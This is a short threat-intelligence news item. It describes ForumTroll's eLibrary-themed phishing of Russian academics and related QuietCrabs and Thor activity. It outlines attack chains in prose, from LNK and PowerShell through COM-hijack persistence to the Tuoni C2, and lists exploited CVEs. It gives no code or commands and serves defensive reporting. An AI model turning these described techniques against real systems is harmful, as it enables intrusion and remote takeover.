ForumTroll Hits Russian Academics with Fake eLibrary Emails

ForumTroll Hits Russian Academics with Fake eLibrary Emails
December 17, 2025 at 12:00 AM

Kaspersky has linked the Operation ForumTroll threat actor to a new phishing wave aimed at Russian academics, shifting from earlier organization-focused attacks to highly targeted individuals in political science, international relations, and global economics. The campaign was detected in October 2025, and the group’s origin remains unknown.

How the lure works

  • Spoofed eLibrary emails appear to come from "support@e-library[.]wiki"
  • The domain was registered in March 2025 and aged to look legitimate, then used to host a clone of the real eLibrary homepage ("elibrary[.]ru")
  • Emails contain one-time-use links that download a personalized ZIP named ".zip"
  • If revisited, the link shows a Russian-language error; non-Windows users are told to try again on Windows
  • The archive holds a Windows LNK shortcut that launches PowerShell, pulling a payload from a remote server
  • The payload retrieves a final-stage DLL, establishes persistence via COM hijacking, and displays a decoy PDF
  • Final payload: Tuoni, a C2 and red-teaming framework that grants remote access to the victim’s Windows device

Campaign context

  • Earlier ForumTroll operations exploited a Chrome zero-day (CVE-2025-2783) to deliver the LeetAgent backdoor and Dante spyware
  • Targeting has focused on Russia and Belarus since at least 2022, and Kaspersky assesses the group will continue pursuing entities and individuals of interest in these countries

Related threat activity highlighted by Positive Technologies

  • QuietCrabs (suspected Chinese; also tracked as UTA0178 and UNC5221)
    • Exploits: Microsoft SharePoint (CVE-2025-53770), Ivanti EPMM (CVE-2025-4427, CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), Ivanti Sentry (CVE-2023-38035)
    • Chain: ASPX web shell → JSP loader → KrustyLoader → Sliver implant
  • Thor (active since May 2025, observed in attacks on Russian companies)
    • Uses LockBit and Babuk ransomware as final payloads
    • Leverages Tactical RMM and MeshAgent to maintain persistence

Bottom line
ForumTroll’s eLibrary-themed phishing shows careful preparation, realistic lures, and a tightly controlled delivery chain designed to evade detection and ensure Windows-only execution—culminating in full remote access via Tuoni. The continued activity of QuietCrabs and Thor underscores broader exploitation of enterprise software and the sustained ransomware threat landscape.

Source: The Hacker News

Back…